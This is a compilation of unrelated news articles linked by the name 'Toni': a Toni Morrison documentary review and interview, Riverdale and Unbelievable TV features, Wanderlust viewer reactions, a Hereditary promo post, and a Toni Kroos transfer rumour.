“Ultimately I knew that words have power.” — Toni Morrison
The visionary and essential novelist Toni Morrison was born on February 18th, 1931 and died on August 5, 2019. In between, she was a voice of great power and resounding truth, a celebrated writer and editor, a recipient of the Presidential Medal of Freedom and a Nobel Prize winner, a mother of two and a teacher of millions.
It is her powerful voice that carries us through director Timothy Greenfield-Sanders’ sweeping and intimate documentary Toni Morrison: The Pieces I Am. “She is a friend of my mind,” says Morrison in the opening moments, reading from Beloved, her 1987 Pulitzer Prize-winning novel. “She gather me, man. The pieces I am. She gather them and give them back to me in all the right order.” Her voice is soft and warm and smooth, the cadence measured and even, inviting us into her extraordinary life. We watch as a pair of hands assembles irregular shards of photographs and patterned paper, a scrapbook portrait built, piece by piece, upon itself. The hands belong to Brooklyn-based Mickalene Thomas, a mixed-media artist whose work often takes shape through painting, collage, photography, and video and draws on culture, history, and themes of sexuality, beauty, and power.
In the opening sequence, Thomas physically gathers pieces of Toni Morrison which include photographs created by Greenfield-Sanders as well as others and arranges them into a shifting video portrait. The opening recalls the style of Morrison’s 1974 nonfiction project The Black Book, “a lavishly illustrated scrapbook spanning three centuries of African-American history, reproducing newspaper clippings, photographs, advertisements, handbills and the like.”
The footage of Thomas’s collage assembly is beautifully buttressed by Kathryn Bostic’s lilting and contemplative jazz score, joined with credits designed by Declan Zimmermann and Perpetual Motion Graphics, and made whole through cuts and rotations by the film’s editor and producer Johanna Giebelhaus.
It’s an astounding opening, a prelude that takes Morrison’s words literally and continues her work championing Black artists and voices. It also gorgeously sets the stage not just for Morrison to speak candidly but also for her friends and colleagues Hilton Als, Angela Davis, Oprah Winfrey, Fran Lebowitz, and others to share their memories and thoughts. The film goes to great lengths to create a sense of craft, ease and intimacy between subject and viewer and it all begins right here, in the opening titles.
Director Timothy Greenfield-Sanders and Producer and Editor Johanna Geibelhaus discuss working with Toni Morrison and the challenges of distilling her remarkable life for film.
A discussion with Director TIMOTHY GREENFIELD-SANDERS and Producer and Editor JOHANNA GIEBELHAUS.
Timothy, you had a relationship with Toni Morrison that spanned decades. How did you first meet?
TGS: I first met Toni Morrison 38 years ago, in the winter of 1981, when she came to my East Village studio for a Soho Weekly News cover portrait. She wore a dark suit with a white blouse and smoked a pipe.
TGS: I was a young photographer and Toni had just finished her fourth novel, Tar Baby. I was impressed by her confidence on the set. Toni liked my work and…

There’s a bundle of joy headed to Riverdale this season… and the mother is not who you’d expect.
The CW teen drama will be incorporating series regular Vanessa Morgan’s real-life pregnancy into the show in Season 5, the actress revealed in an Instagram post on Saturday. Announcing that she’s headed to maternity leave, Morgan — who has played Toni on Riverdale since Season 2 — said she’s “feeling grateful to my showrunner & producers for being so accommodating & writing my pregnancy into the show!… Also proud of my body for allowing me to still work almost 9 months preggo.”
The news may come as a surprise to Riverdale fans, though, since Toni is currently dating Madelaine Petsch’s Cheryl Blossom, as of the end of Season 4. Does the fact that Toni’s pregnant mean she and Cheryl are headed for splitsville? Well, not necessarily: Riverdale will be incorporating a time jump of several years into Season 5, so maybe Toni and Cheryl eventually decide to get married and start a family together? Or maybe she serves as a surrogate for a friend who wants a baby (like Kevin, perhaps)? The possibilities are endless, really.
One thing’s for sure: We’ll find out when Riverdale returns for Season 5 on Wednesday, Jan. 20 at 8/7c on The CW.
Check out Morgan’s Instagram post below, and then hit the comments and tell us, Riverdale fans: Who do you think will be the father of Toni’s baby?

It’s been a long year, Riverdale fans… but prom is just around the corner.
The CW teen drama’s showrunner Roberto Aguirre-Sacasa posted a photo on Instagram on Tuesday from the upcoming Season 5’s prom episode, with Madelaine Petsch’s Cheryl and Vanessa Morgan’s Toni dancing and smiling together. (Red really is Cheryl’s color, isn’t it?) Aguirre-Sacasa confirmed that Riverdale High’s senior prom will be “our first episode back” (aka the Season 5 premiere) and added: “Rest assured, ALL the queens will [be] reigning SUPREMELY next season!”
Riverdale had to cut Season 4 short due to the global coronavius pandemic, with the final three episodes — including the teens’ prom and graduation — being pushed to the start of Season 5, which is set to debut on The CW in January. In a tweet on Tuesday, Aguirre-Sacasa announced that the Riverdale production offices are open, “and we are in pre-production on Season 5.” (Filming hasn’t gotten underway yet, though; the above photo is from the original Season 4 shoot that was cut short.)
The prom and graduation episodes are “big, emotional episodes,” the EP told TVLine back in May when the Season 4 finale aired, “and there’s a lot of stuff with the characters that we’re still playing out, so it felt like maybe what we’ll do is start with the last three episodes. After being with the kids at the high school for four years, you kind of don’t want to take graduation away from them. So what we’re doing is picking up right where we left off for the first three episodes.” Riverdale will then do a significant time jump several years forward, TVLine reported first back in May, picking up with Archie and the gang after high school.
And about that “ALL the queens… reigning SUPREMELY” quote: Morgan made headlines in June by calling out Riverdale writers for reducing Black characters (including Toni) to mere “sidekicks” on the show. Aguirre-Sacasa responded by apologizing and vowing to “do better to honor her and the character she plays… as well as all of our actors and characters of color.”

Last week, we at TVLine revealed our 20 finalists for Performer of the Year. We have since debated fiercely among ourselves to come up with a winning trio whose collective work was unbelievably affecting — Kaitlyn Dever, Merritt Wever and Toni Collette, of Netflix’s Unbelievable.
I was raped. With those three words — the first uttered by Dever’s Marie Adler — the miniseries was set in motion, almost daring you to stay tuned as it told the story of a teenage rape victim whose case was heartlessly mishandled by detectives in Lynnwood, Wash. Marie had just been violated in a multitude of ways, but every other question from the first officer on the scene — You were out late? Who was on the phone, your boyfriend? How do you know he was taking pictures? — cast aspersion on what transpired. Throughout the opening episode, Dever sold us on how Marie could be so disoriented by the reactions of law enforcement, nurses and her uniquely problematic foster mothers, that she’d get shaky on details, ultimately to a degree that she would not only be disbelieved, but punished. At the point she was charged with making a false report, any hope of justice seemed to be lost.
Enter, some three years later, Wever’s Karen Duvall and Collette’s Grace Rasmussen, police detectives from separate Colorado cities whose worlds were about to be indelibly intertwined. Duvall was investigating the rape of a college student in Golden when a remark from her police officer husband led her to wonder if an open Westminster case might be related. In Duvall, Wever created a detective who was attentive and compassionate — a stark contrast to those who worked Marie’s case — and unstoppable in her solving of a mystery. Thing is, she just needed the right kind of help. Collette’s Rasmussen was, in turn, a decidedly steelier LEO, one less driven by emotion and more a slave to facts (dissuading as they often may be).
As actresses and as on-screen detectives, Wever and Collette formed a helluva team, not falling into some tidy “insta-BFF” dynamic but zeroing in on and playing the differences that made each woman who she was — and revealing, every step of the way, how each detective’s best qualities began to rub off on the other.
Co-created by Susannah Grant, Ayelet Waldman and Michael Chabon (based on a 2015 news article originally published by ProPublica and The Marshall Project), Unbelievable through its eight-episode run toggled between these two timelines. Dever delved deeper into Marie’s increasingly fractured, despair-filled world, while Wever and Collette’s characters kept alive the tiniest spark of hope. In lesser hands, Unbelievable would not have captured the attention it did, which would have been a great disservice to the larger conversation it amplified. But through the work of these three women — as well as costars such as Elizabeth Marvel, Bridget Everett, Danielle Macdonald, Dale Dickey, Liza Lapira and Brooke Smith — the series met and exceeded its full potential.
She wanted to say thank you. With those six words, this gripping story drew to a close. And we say thank you, that it was told, and told so damn well.
Do you agree with our pick for Performer(s) of the Year? Or did you have a different favorite? Let us know in the comments below.

“Choni” fanatics, feel free to sit this one out. All the rest of you Riverdale fans: Let’s talk.
As longtime Riverdale watchers, we’re accustomed to suspending our disbelief on a weekly basis. Masked serial killers, murderous cults and rampant mob warfare, all in a sleepy small town… sure, why not? But there are some logical leaps that even the Riverdale faithful cannot quite accept, and Season 4 has presented us with a big one: Why in the world hasn’t Toni dumped Cheryl yet, exactly?
To be clear, we have nothing against Cheryl — we love her, actually! — or even against those two as a couple, entering this season. The tough-girl Serpent and the mischievous glam girl were a beautifully mismatched pair from the start, and we were rooting for them all the way; their Season 2 kiss, when Toni rescued Cheryl from the Sisters of Quiet Mercy, was probably Riverdale‘s most romantic moment ever. But now in Season 4, that romance has worn off considerably… mostly because Cheryl has gone completely and irretrievably off the deep end.
To recap: She’s been keeping the corpse of her dead brother Jason propped up in her basement, and she talks to it daily. She thinks that a creepy sailor doll is possessed by the spirit of her dead triplet brother Julian… who she consumed in the womb. (Ew.) Her family feud led to Toni accidentally killing Cheryl’s Uncle Bedford, and Cheryl insisted they dump the body rather than tell the authorities. She even tried to convince her relatives they were eating meat pies with bits of ground-up Uncle Bedford in them (!). It’s been a relentless cascade of bizarre behavior and big blaring red flags, and Toni has stuck around through all of it. (Every “Choni” scene this season seems to end with Cheryl saying something off-the-wall ridiculous and Toni looking worried and confused.)
Truthfully, as soon as Toni saw Jason’s dead body, she should’ve hightailed it out of there, but every week that goes by just makes her decision to stay at Thistle House worse and worse. Yes, Cheryl’s always been a bit strange, and we understand that Toni doesn’t want to abandon someone she loves and who is clearly going through a lot, psychologically. But love can only go so far, and now Toni’s blind loyalty has led to her taking a life and incriminating herself further by covering it up. It’d actually be healthier at this point for Toni to break up with Cheryl so she can concentrate on herself and process her grief for Jason in a mature manner. But healthy and mature decisions aren’t really Riverdale‘s thing, now are they?
We know we shouldn’t expect Riverdale to be in any way realistic — and we know “Choni” fans everywhere will be calling for our heads for daring to say all of this out loud. But enough is enough: Cheryl and Toni’s relationship has grown decidedly toxic this season, and we think it’d be best for everyone involved if Toni pulled the plug on this thing prior to graduation. She can always head to the big city in search of a more stable and suitable romantic partner. Maybe Katy Keene needs a roommate?
Alright, Riverdale fans: Should Cheryl and Toni stay together, or split up? Vote in our poll, and then hit the comments to share your thoughts.

THE PERFORMERS | Toni Collette and Merritt Wever
THE SHOW | Netflix’s Unbelievable
THE EPISODE | Episode 6 (Sept. 13, 2019)
THE PERFORMANCES | The 2019 Emmys are just hours away, but after binging Netflix’s often grueling yet ultimately life-affirming eight-episode, fact-based drama our minds are focused on next year’s ceremony and this dream scenario: the Outstanding Lead Actress in a Limited Series contest ending in a tie between Collette and Wever. Never before has a title of a project so aptly described the performances of its stars, but the duo’s thoroughly intertwined work was so staggeringly rich and subtle that it does indeed defy belief.
As dogged serial rapist-chasers Grace Rasmussen and Karen Duvall, Collette and Wever infused their alter egos with complexity, intelligence and empathy, breathing new life in the well-worn “buddy cop” genre. So consistently sublime was their work that it made choosing specific scenes or even a particular episode especially challenging. Ultimately, we settled on a scene in Episode 6 which finds the two detectives bonding during an all-night stakeout. No single Unbelievable sequence better illustrates the magic of this pairing, the effortlessness of their chemistry, than this one.
The meaty, bare bones two-hander — which is destined to become signature Forensics competition fodder in the category of Duo Interpretation — begins with Rasmussen offering a rare apology to Duvall for belittling her faith during an earlier stress-induced flare-up. Underscoring her alter ego’s unfamiliarity with eating crow as well as her deep affection for her partner, Collette endearingly stammered through her mea culpa. “Sorry for the whole ‘f–k the Lord’ thing,” she muttered, before conceding, “It was not my finest moment.”
With the table set for air-clearing, Duvall similarly lowered her guard and copped to being a longtime “fangirl” from afar, Wever expertly keeping her character’s idol worship in check as much as humanly possible so as not to further tip the power imbalance. But Wever made sure to lace her words and mannerisms with enough genuine, if restrained, sentiment to let the audience know how impactful/empowering their decade-earlier encounter was for her then-green detective.
When the nearly 9-minute scene ended as abruptly as it began, we felt a similar admiration for Collette and Wever, two actresses at the very top of their game who have given birth to one of TV’s all-time best partnerships.
HONORABLE MENTION | Go ahead: Try not to guffaw when First Wives Club’s Michelle Buteau, as Bree, launches herself at the PTA mom she’s just realized is sleeping with her estranged husband. In the seconds before the Episode 2 outburst, Buteau’s facial features flit around the emotional spectrum: narrowed eyebrows of suspicion, widened eyes of realization, flared nostrils of “bitch, you’d better duck!” When Bree shoots out of her seat, nearly flipping a desk in the process, Buteau doesn’t hold a thing back: She yells, she points, she convincingly turns “THOT” into an adjective. Perhaps the actress’ skill is best shown a moment later, when Bree instantly goes from combative to crushed: “I want a divorce,” Buteau says, making Bree’s voice small and defeated. It’s a strong center-stage moment for an undersung comedic actress — and we hope Buteau gets a lot more of them in the future.
HONORABLE MENTION | The “Found Diary That Fuels Flashbacks” trope can be a bore if you don’t have the right cast playing out the past. But Cara Mantella, in her third but by far largest Lodge 49 appearance, pulled us deep into Jackie Loomis’ strange world and showed us how the Lodge’s trappings shaped her as a woman of the ’60s. To start, Mantella portrayed Jackie as dutiful to Wallace, seeing them as partners — especially in their plot to pinch the scrolls from Lodge 1. When Wallace proved ill-fit for that escapade, Jackie rose to the occasion. Energized, she drew the attention of the Parabola Group’s Werner, and Mantella showed us a bolder Jackie who thought she could recognize a capable cohort. Alas, he, too, let her down. But rather than join Wallace in a suicide pact, she chose life — in part to watch over Larry, who come wartime would need his mother, greatly.
HONORABLE MENTION | Let’s be honest: None of us expected Caroline Rhea, most fondly remembered as Aunt Hilda on Sabrina the Teenage Witch, to hold her own at a notoriously ruthless Comedy Central roast. And yet she thrived during Sunday’s “tribute” to Alec Baldwin, eviscerating her fellow roasters with a steady stream of savage-yet-tasteful burns. Introduced by Sean Hayes as having just flown in on “the world’s strongest broomstick,” Rhea replied that he’s “going to be hard to top… but plenty of men have managed to do it.” From that moment on, it was clear — Aunt Hilda did not come to play. She even found time to make fun of Ken Jeong for actually thinking that Beyoncé was the Unicorn on The Masked Singer.

Wanderlust follows actress Toni Collette, 45, starring as Joy Richards who is a therapist trying to find a way to keep the spark with her husband, Alan Richards (Steven Mackintosh), alive.
It comes after a cycling accident caused her to reassess their relationship.
The couple decided to have an open relationship after years of marriage.
Tonight’s episode saw Joy and Alan’s experiment, and the marriage itself, face its biggest test yet after public and private factors threatened to tear the two of them apart.
Tom (Joe Hurst) had to finally figure out who he wanted and exactly how he’s meant to get them.
Events placed Alan’s job in jeopardy, whilst bereavement in Lawrence’s life brought him and Joy ever closer.
Those watching at home are still divided over the show, four episodes into the series.
One viewer tweeted: “Most terrible drama I have seen lately, absolute rubbish #wanderlust.”
“I had high hopes for #Wanderlust despite lots of people’s criticism and the terrible ratings – but tonight’s episode was absolutely all over the place!” posted another.
A third asked: “Why am I even still watching this sh**e? #wanderlust.”
“Really need to give up on watching #wanderlust,” wrote another.
However, others loved tonight’s continuation of the BBC One show.
One viewer tweeted: “Love #wanderlust @ZaweAshton Is amazing in it!!!”
“It pains me, it physically pains me, that #Wanderlust is getting such poor ratings. I don’t think I’ve hated BARB viewers this much since River flopped,” said another.
A third added: “So many things I am enjoying about BBC’s #Wanderlust. Tonight, my appreciation is for Nick Payne’s writing and the realistic portrayal of female sexual desire.”
A synopsis for next week’s episode teases the unveiling of several secrets.
The synopsis reads: “In the midst of all the turbulence in her life, Joy’s regular therapy session with Angela becomes an in-depth exploration of the secrets Joy has been hiding from everyone, even herself.
“Wanderlust looks at how we build and maintain happy relationships and asks if lifelong monogamy is possible – or even desirable.
“Wanderlust is a searingly insightful and funny exploration of the relationships of a multi-generational family.”
Wanderlust continues next Tuesday on BBC One at 9pm.

If you’re not hyped enough for Hereditary yet, please enjoy this incredible promo featuring Toni Collette unleashing all her pent-up rage and fury. It’s effective as hell, and darn scary too boot. Can we fast-forward to the release date for this already? Check out the Hereditary promo below.
My excitement for Hereditary is getting out of control at this point. I think The Witch (another A24 joint) was the last horror film that had me this hyped, and that film didn’t disappoint. I don’t think this one will either, as virtually every single early festival review has been overwhelmingly positive. And now here’s a new Hereditary promo, which shifts all its focus to Toni Collette. And rightfully so, since she’s a killer actress and appears to be doing some of her best work here.
I can’t get over how intense this promo is. Give the editor who cut this together a raise, A24. The Hereditary trailers in general have all been effective. Perhaps too effective. As The Sydney Morning Herald reports, an Australian audience gathered to watch the family film Peter Rabbit had a bit of a meltdown when the Hereditary trailer was accidentally shown.
“It was dreadful. Very quickly you could tell this was not a kid’s film,” an audience member said. “Parents were yelling at the projectionist to stop, covering their kids’ eyes and ears. A few went out to get a staff member but she was overwhelmed and didn’t really know what to do. Some parents fled the cinema with their kids in tow.”
I’ve watched multiple Hereditary trailers now, and this promo, and yet I still don’t really know what the hell this movie is about. That’s a good thing – the less I know, the more effective I’m sure the film will be. Steven Prokopy reviewed Hereditary for /Film at Sundance, and said “Hereditary takes its deep-seated sense of danger and foreboding quite seriously and with a level of maturity that few of today’s horror releases do,” adding:
Hereditary also has enough conspiracy-related plot twists to warrant the comparisons to Rosemary’s Baby, although this family’s descent into despair and madness seems more tied to destiny than being pushed by outside forces. The film’s deliberate pacing, commitment to atmosphere over cheap scares, and stellar cast, led by the remarkable Collette, make this work an early contender for one of the best horror films of the year. There’s an artistry and level of craftsmanship that is too often lacking in movies designed to scare or otherwise creep us out, and the effort is both effective as hell and greatly appreciated. Arter is a filmmaker less interested in spectacle and more intent on a type of world building that places his audience at the center of this fresh hell — both the last place we want to be, as well as exactly where we want to be for this ride.
Hereditary, starring Toni Collette, Gabriel Byrne, Alex Wolff, and Milly Shapiro, opens on June 8, 2018. I really don’t know if I can wait that long, but I’ll do my best.
When the matriarch of the Graham family passes away, her daughter’s family begins to unravel cryptic and terrifying secrets about their ancestry. The more they discover, the more they find themselves trying to outrun their sinister fate.

According to Spanish publication Don Balon, PSG bosses are fed up with Real Madrid’s attempts to unsettle Neymar and want revenge.
It is claimed the French club have contacted Kroos’ agent to test the water ahead of a summer swoop.
They are reportedly willing to pay €200million (£173m) to seal a deal.
Don Balon say PSG plan to double Kroos’ current pay packet and hand him a five-year contract.
However, the Germany international’s agent reportedly told PSG to back off until the end of the season.
Kroos has three seasons left on his contract with Real Madrid.
He joined Los Blancos from Bayern Munich in 2014 and has helped the team to two Champions League titles and one La Liga crown.
Despite being rated as one of the leading midfielders in European football, Kroos has been linked with a move away from the Bernabeu this summer.
Kroos has also been linked with a move to Manchester United.
Real Madrid president Florentino Perez is reportedly plotting a revamp of the squad after a disappointing domestic campaign.
Perez is said to be desperate to land Neymar from PSG but needs to raise the funds to pull off such a deal.
